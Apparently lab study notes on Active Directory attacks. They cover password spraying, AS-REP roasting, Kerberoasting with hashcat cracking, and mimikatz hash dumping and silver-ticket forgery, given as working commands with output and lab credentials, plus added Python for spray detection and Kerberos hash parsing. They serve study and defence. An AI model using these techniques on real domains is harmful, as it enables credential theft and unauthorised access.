{% code title="Checking the password and lockout policy with net accounts" overflow="wrap" lineNumbers="true" %}
PS C:\Users\jeff> net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: 5
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: WORKSTATION
The command completed successfully.
{% endcode %}
{% code title="Authenticating using DirectoryEntry" overflow="wrap" lineNumbers="true" %}
PS C:\Users\jeff> $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
PS C:\Users\jeff> $PDC = ($domainObj.PdcRoleOwner).Name
PS C:\Users\jeff> $SearchString = "LDAP://"
PS C:\Users\jeff> $SearchString += $PDC + "/"
PS C:\Users\jeff> $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
PS C:\Users\jeff> $SearchString += $DistinguishedName
PS C:\Users\jeff> New-Object System.DirectoryServices.DirectoryEntry($SearchString, "pete", "Nexus123!")
{% endcode %}
{% code title="Successfully authenticated with DirectoryEntry" overflow="wrap" lineNumbers="true" %}
distinguishedName : {DC=corp,DC=com}
Path : LDAP://DC1.corp.com/DC=corp,DC=com
{% endcode %}
{% code title="Password spraying with Spray-Passwords.ps1" overflow="wrap" lineNumbers="true" %}
PS C:\Users\jeff> cd C:\Tools
PS C:\Tools> powershell -ep bypass
...
PS C:\Tools> .\Spray-Passwords.ps1 -Pass Nexus123! -Admin
WARNING: also targeting admin accounts.
Performing brute force - press [q] to stop the process and print results...
Guessed password for user: 'pete' = 'Nexus123!'
Guessed password for user: 'jen' = 'Nexus123!'
Users guessed are:
'pete' with password: 'Nexus123!'
'jen' with password: 'Nexus123!'
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ cat users.txt
dave
jen
pete
kali@kali:~$ crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
SMB 192.168.50.75 445 CLIENT75 [*] Windows 10.0 Build 22000 x64 (name:CLIENT75) (domain:corp.com) (signing:False) (SMBv1:False)
SMB 192.168.50.75 445 CLIENT75 [-] corp.com\dave:Nexus123! STATUS_LOGON_FAILURE
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\jen:Nexus123!
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\pete:Nexus123!
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ crackmapexec smb 192.168.50.75 -u dave -p 'Flowers1' -d corp.com
SMB 192.168.50.75 445 CLIENT75 [*] Windows 10.0 Build 22000 x64 (name:CLIENT75) (domain:corp.com) (signing:False) (SMBv1:False)
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\dave:Flowers1 (Pwn3d!)
{% endcode %}
{% code title="crackmapexec with multiple passwords" lineNumbers="true" %}
crackmapexec smb 192.168.184.73 -u users.txt -p 'BrouhahaTungPerorateBroom2023!' 'HomeTaping199!' -d corp.com --continue-on-success
SMB 192.168.184.73 445 FILES04 [*] Windows Server 2022 Build 20348 x64 (name:FILES04) (domain:corp.com) (signing:False) (SMBv1:False)
SMB 192.168.184.73 445 FILES04 [-] corp.com\Administrator:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\Administrator:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\iis_service:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\iis_service:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\jen:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\jen:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\pete:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\pete:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\dave:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\dave:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\jeff:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\jeff:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\krbtgt:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\krbtgt:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\stephanie:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\stephanie:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\Guest:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\Guest:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [+] corp.com\jeffadmin:BrouhahaTungPerorateBroom2023! (Pwn3d!)
SMB 192.168.184.73 445 FILES04 [-] corp.com\jeffadmin:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\leon:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [+] corp.com\leon:HomeTaping199! (Pwn3d!)
{% endcode %}
We should also try without the domain, using --local-auth to authenticate against local accounts:
{% code title="Spraying local accounts with --local-auth" overflow="wrap" lineNumbers="true" %}
crackmapexec smb 172.116.6.6-7 -u michelle -p 'NotMyPassword0k?' --local-auth
{% endcode %}
With nxc the first run might fail with a NetBIOS timeout while a second run succeeds:
{% code title="1st time it fails, 2nd time it succeeds" overflow="wrap" lineNumbers="true" %}
nxc smb 172.16.116.14-15 -u michelle -p 'NotMyPassword0k?' -d relia.com --continue-on-succes
SMB 172.16.116.15 445 WK02 [*] Windows 11 Build 22000 x64 (name:WK02) (domain:relia.com) (signing:False) (SMBv1:False)
SMB 172.16.116.14 445 WK01 [*] Windows 11 Build 22000 x64 (name:WK01) (domain:relia.com) (signing:False) (SMBv1:False)
SMB 172.16.116.15 445 WK02 [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.16.116.14 445 WK01 [-] Connection Error: The NETBIOS connection with the remote host timed out.
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
┌──(kali㉿kali)-[~/offsec/relia]
└─$
┌──(kali㉿kali)-[~/offsec/relia]
└─$ nxc smb 172.16.116.14-15 -u michelle -p 'NotMyPassword0k?' -d relia.com --continue-on-succes
SMB 172.16.116.15 445 WK02 [*] Windows 11 Build 22000 x64 (name:WK02) (domain:relia.com) (signing:False) (SMBv1:False)
SMB 172.16.116.14 445 WK01 [*] Windows 11 Build 22000 x64 (name:WK01) (domain:relia.com) (signing:False) (SMBv1:False)
SMB 172.16.116.15 445 WK02 [+] relia.com\michelle:NotMyPassword0k?
SMB 172.16.116.14 445 WK01 [+] relia.com\michelle:NotMyPassword0k?
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
PS C:\Tools> type .\usernames.txt
pete
dave
jen
PS C:\Tools> .\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/06/22 - Ronnie Flathers @ropnop
2022/09/06 20:30:48 > Using KDC(s):
2022/09/06 20:30:48 > dc1.corp.com:88
2022/09/06 20:30:48 > [+] VALID LOGIN: [email protected]:Nexus123!
2022/09/06 20:30:48 > [+] VALID LOGIN: [email protected]:Nexus123!
2022/09/06 20:30:48 > Done! Tested 3 logins (2 successes) in 0.041 seconds
{% endcode %}
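As an added detection-side example (not from the original notes), the following Python flags the two failure patterns above in logon-failure telemetry using the lockout policy from `net accounts`: a spray (one source, one password, many accounts, each kept under the threshold) and a per-account brute force that trips the lockout. The log records, the source addresses 10.0.0.5 and 192.168.50.80 and the `min_accounts` setting are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Policy values reported by `net accounts` above.
LOCKOUT_THRESHOLD = 5                       # failures per account before lockout
OBSERVATION_WINDOW = timedelta(minutes=30)  # window in which those failures count

# Constructed sample records (not real logs), modelled on the fields a SIEM
# keeps from Event ID 4625 (logon failure) and 4771 (Kerberos pre-auth failure):
# (timestamp, event id, target account, source address).
# 10.0.0.5 and 192.168.50.80 are invented addresses for this example.
SAMPLE_EVENTS = [
    ("2022-09-06 20:30:41", 4625, "dave",        "10.0.0.5"),       # one password,
    ("2022-09-06 20:30:41", 4625, "jeff",        "10.0.0.5"),       # many accounts:
    ("2022-09-06 20:30:42", 4625, "iis_service", "10.0.0.5"),       # spray pattern
    ("2022-09-06 20:30:42", 4625, "krbtgt",      "10.0.0.5"),
    ("2022-09-06 20:30:43", 4625, "Guest",       "10.0.0.5"),
    ("2022-09-06 20:45:10", 4625, "jeff",        "192.168.50.75"),  # a user mistyping
    ("2022-09-06 20:45:20", 4625, "jeff",        "192.168.50.75"),  # his own password
    ("2022-09-06 20:50:00", 4771, "stephanie",   "192.168.50.80"),  # one account,
    ("2022-09-06 20:50:05", 4771, "stephanie",   "192.168.50.80"),  # many passwords:
    ("2022-09-06 20:50:10", 4771, "stephanie",   "192.168.50.80"),  # brute force that
    ("2022-09-06 20:50:15", 4771, "stephanie",   "192.168.50.80"),  # trips the lockout
    ("2022-09-06 20:50:20", 4771, "stephanie",   "192.168.50.80"),
]


def parse_events(records):
    """Turn the raw tuples into dicts with a datetime and a normalised account name."""
    return [
        {"time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "event": eid,
         "account": account.lower(), "source": source}
        for ts, eid, account, source in records
    ]


def _grouped(events, key):
    """Group events by one field, each group sorted by time."""
    groups = defaultdict(list)
    for ev in events:
        groups[ev[key]].append(ev)
    for evs in groups.values():
        evs.sort(key=lambda e: e["time"])
    return groups


def detect_spray(events, min_accounts=3, window=OBSERVATION_WINDOW):
    """Sources that failed against at least min_accounts distinct accounts inside one window.

    A spray keeps every account under LOCKOUT_THRESHOLD, so counting failures per
    account misses it; counting distinct accounts per source does not.
    """
    hits = {}
    for source, evs in _grouped(events, "source").items():
        best = set()
        for i, first in enumerate(evs):
            in_window = {e["account"] for e in evs[i:] if e["time"] - first["time"] <= window}
            if len(in_window) > len(best):
                best = in_window
        if len(best) >= min_accounts:
            hits[source] = sorted(best)
    return hits


def accounts_at_lockout(events, threshold=LOCKOUT_THRESHOLD, window=OBSERVATION_WINDOW):
    """Accounts whose failures inside one observation window reach the lockout threshold."""
    locked = []
    for account, evs in _grouped(events, "account").items():
        for i, first in enumerate(evs):
            if sum(1 for e in evs[i:] if e["time"] - first["time"] <= window) >= threshold:
                locked.append(account)
                break
    return sorted(locked)
```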
{% code title="" overflow="wrap" lineNumbers="true" %}
impacket-GetNPUsers -dc-ip 192.168.194.70 -request -outputfile hashes.asreproast corp.com/pete
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
Name MemberOf PasswordLastSet LastLogon UAC
---- -------- -------------------------- -------------------------- --------
dave 2022-09-02 19:21:17.285464 2022-09-07 12:45:15.559299 0x410200
{% endcode %}
{% code title="Obtaining the correct mode for Hashcat" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ hashcat --help | grep -i "Kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
PS C:\Users\jeff> cd C:\Tools
PS C:\Tools> .\Rubeus.exe asreproast /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: AS-REP roasting
[*] Target Domain : corp.com
[*] Searching path 'LDAP://DC1.corp.com/DC=corp,DC=com' for '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
[*] SamAccountName : dave
[*] DistinguishedName : CN=dave,CN=Users,DC=corp,DC=com
[*] Using domain controller: DC1.corp.com (192.168.50.70)
[*] Building AS-REQ (w/o preauth) for: 'corp.com\dave'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
[email protected]:AE43CA9011CC7E7B9E7F7E7279DD7F2E$7D4C59410DE2984EDF35053B7954E6DC9A0D16CB5BE8E9DCACCA88C3C13C4031ABD71DA16F476EB972506B4989E9ABA2899C042E66792F33B119FAB1837D94EB654883C6C3F2DB6D4A8D44A8D9531C2661BDA4DD231FA985D7003E91F804ECF5FFC0743333959470341032B146AB1DC9BD6B5E3F1C41BB02436D7181727D0C6444D250E255B7261370BC8D4D418C242ABAE9A83C8908387A12D91B40B39848222F72C61DED5349D984FFC6D2A06A3A5BC19DDFF8A17EF5A22162BAADE9CA8E48DD2E87BB7A7AE0DBFE225D1E4A778408B4933A254C30460E4190C02588FBADED757AA87A
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ sudo hashcat -m 18200 hashes.asreproast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
[email protected]:ae43ca9011cc7e7b9e7f7e7279dd7f2e$7d4c59410de2984edf35053b7954e6dc9a0d16cb5be8e9dcacca88c3c13c4031abd71da16f476eb972506b4989e9aba2899c042e66792f33b119fab1837d94eb654883c6c3f2db6d4a8d44a8d9531c2661bda4dd231fa985d7003e91f804ecf5ffc0743333959470341032b146ab1dc9bd6b5e3f1c41bb02436d7181727d0c6444d250e255b7261370bc8d4d418c242abae9a83c8908387a12d91b40b39848222f72c61ded5349d984ffc6d2a06a3a5bc19ddff8a17ef5a22162baade9ca8e48dd2e87bb7a7ae0dbfe225d1e4a778408b4933a254c30460e4190c02588fbaded757aa87a:Flowers1
...
{% endcode %}
To identify users with the enabled AD user account option Do not require Kerberos preauthentication, we can use PowerView's Get-DomainUser function with the option -PreauthNotRequired on Windows. On Kali, we can use impacket-GetNPUsers as shown in listing 14 without the -request and -outputfile options.
{% code title="" overflow="wrap" lineNumbers="true" %}
PS C:\Tools> Get-DomainUser -PreauthNotRequired

logoncount            : 65535
badpasswordtime       : 10/18/2022 8:05:18 PM
distinguishedname     : CN=dave,CN=Users,DC=corp,DC=com
objectclass           : {top, person, organizationalPerson, user}
lastlogontimestamp    : 8/13/2024 11:33:28 PM
name                  : dave
objectsid             : S-1-5-21-1987370270-658905905-1781884369-1103
samaccountname        : dave
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
countrycode           : 0
whenchanged           : 8/14/2024 6:33:28 AM
instancetype          : 4
usncreated            : 12778
objectguid            : 83522edd-09ce-4bae-804d-3d83b931e1f3
lastlogoff            : 12/31/1600 4:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=corp,DC=com
dscorepropagationdata : {9/2/2022 11:21:17 PM, 1/1/1601 12:00:00 AM}
memberof              : CN=Development Department,DC=corp,DC=com
lastlogon             : 8/13/2024 11:36:28 PM
badpwdcount           : 0
cn                    : dave
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
whencreated           : 9/2/2022 11:21:17 PM
primarygroupid        : 513
pwdlastset            : 9/7/2022 9:54:57 AM
usnchanged            : 557209
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
┌──(kali㉿kali)-[~/offsec]
└─$ impacket-GetNPUsers -dc-ip 192.168.194.70 corp.com/pete
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
Name MemberOf PasswordLastSet LastLogon UAC
---- ---------------------------------------- -------------------------- -------------------------- --------
dave CN=Development Department,DC=corp,DC=com 2022-09-07 12:54:57.521205 2024-08-14 02:48:28.482098 0x410200
{% endcode %}
Let's assume that we are conducting an assessment in which we cannot identify any AD users with the account option Do not require Kerberos preauthentication enabled. While enumerating, we notice that we have GenericWrite or GenericAll permissions on another AD user account. Using these permissions, we could reset their passwords, but this would lock out the user from accessing the account. We could also leverage these permissions to modify the User Account Control value of the user to not require Kerberos preauthentication. This attack is known as Targeted AS-REP Roasting. Notably, we should reset the User Account Control value of the user once we've obtained the hash.
{% embed url="https://adsecurity.org/?p=3658" %}
{% embed url="https://blog.netwrix.com/2022/11/03/cracking_ad_password_with_as_rep_roasting/" %}
{% code title="" overflow="wrap" lineNumbers="true" %}
PS C:\Tools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : corp.com
[*] Searching path 'LDAP://DC1.corp.com/DC=corp,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : iis_service
[*] DistinguishedName : CN=iis_service,CN=Users,DC=corp,DC=com
[*] ServicePrincipalName : HTTP/web04.corp.com:80
[*] PwdLastSet : 9/7/2022 5:38:43 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\hashes.kerberoast
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ cat hashes.kerberoast
$krb5tgs$23$*iis_service$corp.com$HTTP/web04.corp.com:[email protected]*$940AD9DCF5DD5CD8E91A86D4BA0396DB$F57066A4F4F8FF5D70DF39B0C98ED7948A5DB08D689B92446E600B49FD502DEA39A8ED3B0B766E5CD40410464263557BC0E4025BFB92D89BA5C12C26C72232905DEC4D060D3C8988945419AB4A7E7ADEC407D22BF6871D...
...
kali@kali:~$ hashcat --help | grep -i "Kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
{% endcode %}
The output of the above command shows that 13100 is the correct mode to crack TGS-REP hashes.
{% code title="" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
$krb5tgs$23$*iis_service$corp.com$HTTP/web04.corp.com:[email protected]*$940ad9dcf5dd5cd8e91a86d4ba0396db$f57066a4f4f8ff5d70df39b0c98ed7948a5db08d689b92446e600b49fd502dea39a8ed3b0b766e5cd40410464263557bc0e4025bfb92d89ba5c12c26c72232905dec4d060d3c8988945419ab4a7e7adec407d22bf6871d
...
d8a2033fc64622eaef566f4740659d2e520b17bd383a47da74b54048397a4aaf06093b95322ddb81ce63694e0d1a8fa974f4df071c461b65cbb3dbcaec65478798bc909bc94:Strawberry1
...
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- ----------- -------- -------------------------- --------- ----------
HTTP/web04.corp.com:80 iis_service 2022-09-07 08:38:43.411468 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*iis_service$CORP.COM$corp.com/iis_service*$21b427f7d7befca7abfe9fa79ce4de60$ac1459588a99d36fb31cee7aefb03cd740e9cc6d9816806cc1ea44b147384afb551723719a6d3b960adf6b2ce4e2741f7d0ec27a87c4c8bb4e5b1bb455714d3dd52c16a4e4c242df94897994ec0087cf5cfb16c2cb64439d514241eec...
{% endcode %}
{% code title="Cracking the TGS-REP hash" overflow="wrap" lineNumbers="true" %}
kali@kali:~/beyond$ sudo hashcat -m 13100 daniela.hash /usr/share/wordlists/rockyou.txt --force
...
$krb5tgs$23$*daniela$BEYOND.COM$beyond.com/daniela*$b0750f4754ff26fe77d2288ae3cca539$0922083b88587a2e765298cc7d499b368f7c39c7f6941a4b419d8bb1405e7097891c1af0a885ee76ccd1f32e988d6c4653e5cf4ab9602004d84a6e1702d2fbd5a3379bd376de696b0e8993aeef5b1e78fb24f5d3c
...
3d3e9d5c0770cc6754c338887f11b5a85563de36196b00d5cddecf494cfc43fcbef3b73ade4c9b09c8ef405b801d205bf0b21a3bca7ad3f59b0ac7f6184ecc1d6f066016bb37552ff6dd098f934b2405b99501f2287128bff4071409cec4e9545d9fad76e6b18900b308eaac8b575f60bb:DANIelaRO123
...
{% endcode %}
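The `$krb5asrep$` and `$krb5tgs$` lines above follow a fixed layout that hashcat keys its mode on; this added Python parser (not from the page or from any tool shown on it) splits both layouts into user, realm, SPN, checksum and encrypted data, validates the hex, and maps the etype to the hashcat mode from the table above. It goes slightly beyond the page by also handling the AES (etype 17/18) kerberoast layout; the sample hashes are constructed filler, and treating a missing AS-REP etype field as etype 23 is my assumption.

```python
import re

# Hashcat modes from the `hashcat --help | grep -i "Kerberos"` table above.
HASHCAT_MODES = {("krb5tgs", 17): 19600, ("krb5tgs", 18): 19700,
                 ("krb5tgs", 23): 13100, ("krb5asrep", 23): 18200}

# Checksum length in hex digits: 16 bytes for RC4-HMAC (etype 23), 12 bytes for
# the AES etypes 17 and 18.
CHECKSUM_HEX_LEN = {23: 32, 17: 24, 18: 24}
HEX = re.compile(r"^[0-9a-fA-F]+$")

# Constructed samples (not real ticket material): the checksum/edata hex is
# filler of a plausible length. Names and SPN are the ones used on this page.
SAMPLE_TGS_RC4 = ("$krb5tgs$23$*iis_service$corp.com$HTTP/web04.corp.com:80@corp.com*$"
                  + "ab" * 16 + "$" + "cd" * 64)
SAMPLE_TGS_AES = ("$krb5tgs$18$iis_service$corp.com$*HTTP/web04.corp.com:80*$"
                  + "ab" * 12 + "$" + "cd" * 64)
SAMPLE_ASREP = "$krb5asrep$23$dave@corp.com:" + "ab" * 16 + "$" + "cd" * 64
SAMPLE_ASREP_NO_ETYPE = "$krb5asrep$dave@corp.com:" + "ab" * 16 + "$" + "cd" * 64


def _split_tail(tail, etype):
    """Validate and normalise the trailing 'checksum$edata' part."""
    checksum, sep, edata = tail.partition("$")
    if not sep or not HEX.match(checksum) or not HEX.match(edata):
        raise ValueError("checksum and edata must be '$'-separated hex")
    if etype in CHECKSUM_HEX_LEN and len(checksum) != CHECKSUM_HEX_LEN[etype]:
        raise ValueError(f"checksum length {len(checksum)} is wrong for etype {etype}")
    return checksum.lower(), edata.lower()


def parse_kerberos_hash(line):
    """Parse a kerberoast ($krb5tgs$) or AS-REP roast ($krb5asrep$) hash line."""
    line = line.strip()
    if line.startswith("$krb5tgs$"):
        etype_str, _, rest = line[len("$krb5tgs$"):].partition("$")
        etype = int(etype_str)
        if rest.startswith("*"):      # RC4 layout: *user$realm$spn*$checksum$edata
            ident, _, tail = rest[1:].partition("*$")
            user, realm, spn = ident.split("$", 2)
        else:                         # AES layout: user$realm$[*spn*$]checksum$edata
            user, realm, tail = rest.split("$", 2)
            spn = None
            if tail.startswith("*"):  # the SPN segment is optional in this layout
                spn, _, tail = tail[1:].partition("*$")
        checksum, edata = _split_tail(tail, etype)
        return {"kind": "krb5tgs", "etype": etype, "user": user, "realm": realm,
                "spn": spn, "checksum": checksum, "edata": edata}
    if line.startswith("$krb5asrep$"):
        rest = line[len("$krb5asrep$"):]
        m = re.match(r"(\d+)\$", rest)
        etype = int(m.group(1)) if m else 23   # etype field absent: assume RC4 (23)
        if m:
            rest = rest[m.end():]
        ident, _, tail = rest.partition(":")   # user@realm:checksum$edata
        user, _, realm = ident.rpartition("@")
        checksum, edata = _split_tail(tail, etype)
        return {"kind": "krb5asrep", "etype": etype, "user": user, "realm": realm,
                "spn": None, "checksum": checksum, "edata": edata}
    raise ValueError("not a $krb5tgs$ or $krb5asrep$ line")


def hashcat_mode(parsed):
    """Hashcat mode for a parsed hash, or None when the table above has no entry."""
    return HASHCAT_MODES.get((parsed["kind"], parsed["etype"]))
```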
{% hint style="info" %} If impacket-GetUserSPNs throws the error "KRB_AP_ERR_SKEW(Clock skew too great)," we need to synchronize the time of the Kali machine with the domain controller. We can use ntpdate or rdate to do so. {% endhint %}
This technique is immensely powerful if the domain contains high-privilege service accounts with weak passwords, which is not uncommon in many organizations. However, if the SPN runs in the context of a computer account, a managed service account, or a group-managed service account, the password will be randomly generated, complex, and 120 characters long, making cracking infeasible. The same is true for the krbtgt user account, which acts as the service account for the KDC. Therefore, our chances of performing a successful Kerberoast attack against SPNs running in the context of user accounts are much higher.
Let's assume that we are performing an assessment and notice that we have GenericWrite or GenericAll permissions on another AD user account. As stated before, we could reset the user's password, but this may raise suspicion. However, we could also set an SPN for the user, kerberoast the account, and crack the password hash in an attack named targeted Kerberoasting. We'll note that in an assessment, we should delete the SPN once we've obtained the hash to avoid adding any potential vulnerabilities to the client's infrastructure.
In general, we need to collect the following three pieces of information to create a silver ticket:

* SPN password hash
* Domain SID
* Target SPN

First, let's confirm that our current user has no access to the resource of the HTTP SPN mapped to iis_service. To do so, we'll use iwr and enter -UseDefaultCredentials so that the credentials of the current user are used to send the web request.
{% code title="" overflow="wrap" lineNumbers="true" %}
PS C:\Users\jeff> iwr -UseDefaultCredentials http://web04
iwr :
401 - Unauthorized: Access is denied due to invalid credentials.
Server Error
401 - Unauthorized: Access is denied due to invalid credentials.
You do not have permission to view this directory or page using the credentials that you supplied.
At line:1 char:1
+ iwr -UseBasicParsing -UseDefaultCredentials http://web04
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebExc
eption
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand/
{% endcode %}
{% code title="Extracting the NTLM hash of iis_service with Mimikatz" overflow="wrap" lineNumbers="true" %}
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 1147751 (00000000:00118367)
Session : Service from 0
User Name : iis_service
Domain : CORP
Logon Server : DC1
Logon Time : 9/14/2022 4:52:14 AM
SID : S-1-5-21-1987370270-658905905-1781884369-1109
msv :
[00000003] Primary
* Username : iis_service
* Domain : CORP
* NTLM : 4d28cf5252d39971419580a51484ca09
* SHA1 : ad321732afe417ebbd24d5c098f986c07872f312
* DPAPI : 1210259a27882fac52cf7c679ecf4443
...
{% endcode %}
{% code title="Obtaining the domain SID from the SID of the current user" overflow="wrap" lineNumbers="true" %}
PS C:\Users\jeff> whoami /user
USER INFORMATION
----------------
User Name SID
========= =============================================
corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105
{% endcode %}
We need to provide the domain SID (/sid:), domain name (/domain:), and the target where the SPN runs (/target:). We also need to include the SPN protocol (/service:), NTLM hash of the SPN (/rc4:), and the /ptt option, which allows us to inject the forged ticket into the memory of the machine we execute the command on.
Finally, we must enter an existing domain user for /user:. This user will be set in the forged ticket. For this example, we'll use jeffadmin. However, we could also use any other domain user since we can set the permissions and groups ourselves.
{% code title="" overflow="wrap" lineNumbers="true" %}
mimikatz # kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
User : jeffadmin
Domain : corp.com (CORP)
SID : S-1-5-21-1987370270-658905905-1781884369
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4d28cf5252d39971419580a51484ca09 - rc4_hmac_nt
Service : http
Target : web04.corp.com
Lifetime : 9/14/2022 4:37:32 AM ; 9/11/2032 4:37:32 AM ; 9/11/2032 4:37:32 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'jeffadmin @ corp.com' successfully submitted for current session
mimikatz # exit
Bye!
{% endcode %}
This means we should have the ticket ready to use in memory. We can confirm this with klist.
{% code title="Confirming the injected ticket with klist" overflow="wrap" lineNumbers="true" %}
